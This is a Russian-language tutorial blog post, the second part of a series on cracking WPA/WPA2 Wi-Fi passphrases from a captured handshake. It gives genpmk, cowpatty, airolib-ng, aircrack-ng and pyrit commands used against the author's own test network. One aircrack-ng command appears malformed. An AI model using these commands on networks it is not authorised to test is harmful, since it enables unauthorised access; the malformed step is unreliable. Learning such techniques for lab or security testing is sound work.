В предыдущей статье (Взлом Wi-Fi сети WPA/WPA2 – перехват handshake – часть 1) было рассказано, как перехватитьhandshake и подобрать парольную фразу + мы поговорили о теории, что не мало важно! Это был простой пример. Теперь же, давайте немного усложним задачу. Усложним задачу только тем, что в этой статье мы познакомимся с такими программами как: genpmk, cowpatty, airolib-ng и pyrit. И научимся их использовать.
Писать снова о теории и как перехватить handshake наверное смысла нет. Поэтому, в случае чего, обратитесь к первой части.
Итак, у нас есть handshake и мы можем приступать к “новому” материалу.
Прежде чем начинать, еще раз напомню, что нам нужен словарь, в котором должна находиться парольная фраза. В моем случае это “helloitismypass“.
Для быстрого взлома мы можем заранее рассчитать (pre-calculate) PMK для конкретной SSID. Следующая команда создаст файл PMK-Wireless, который будет содержать предварительно сгенерированный (pre-generated) PMK:
# genpmk -f mypass.lst -d PMK-Wireless -s TestWireless
PMK-файл создан, теперь будем использовать cowpatty для взлома WPA пароля.
Для справки: эксперимент проводил на BackTrack 5 R3, в котором предустановленна cowpatty v4.6. Так вот, если задать команду:
# cowpatty -d PMK-Wireless -r handshaketest-01.cap -s TestWireless
…выдается ошибка “end of pcap capture file incomplete four-way handshake exchange“.
Решение было найдено здесь. В котором сказано, что нужно добавить опцию -2, после чего все будет работать нормально:
# cowpatty -2 -d PMK-Wireless -r handshaketest-01.cap -s TestWireless
Пароль получен! Обратите внимание за какое время cowpatty подобрал пароль = 0.32 секунды.
Теперь тоже самое, но с другими программами.
Для того чтобы использовать PMK-файл с aircrack-ng, нам нужно воспользоваться программой airolib-ng. Для этого зададим след. команду:
# airolib-ng PMK-Aircrack --import cowpatty PMK-Wireless
“Скормим” созданную БД (PMK-Aircrack) aircrack-ng. После чего процесс взлома будет существенно выше:
# aircrack-ng -r PMK-Aircrack PMK-Wireless
Готово.
Pyrit может использовать многопроцессорные системы (multi-CPU) для быстрого взлома. Более подробную информацию ищите на официальном сайте.
# pyrit -r handshaketest-01.cap -i PMK-Wireless attack_cowpatty
Вот и все! Ничего сложного.
Чтобы взломать сеть Wi-Fi с помощью Kali Linux, вам нужна беспроводная карта, поддерживающая режим мониторинга…
Работа с консолью считается более эффективной, чем работа с графическим интерфейсом по нескольким причинам.Во-первых, ввод…
Конечно, вы также можете приобрести подписку на соответствующую услугу, но наличие SSH-доступа к компьютеру с…
С тех пор как ChatGPT вышел на арену, возросла потребность в поддержке чата на базе…
Если вы когда-нибудь окажетесь в ситуации, когда вам нужно взглянуть на спектр беспроводной связи, будь…
Elastic Security стремится превзойти противников в инновациях и обеспечить защиту от новейших технологий злоумышленников. В…
View Comments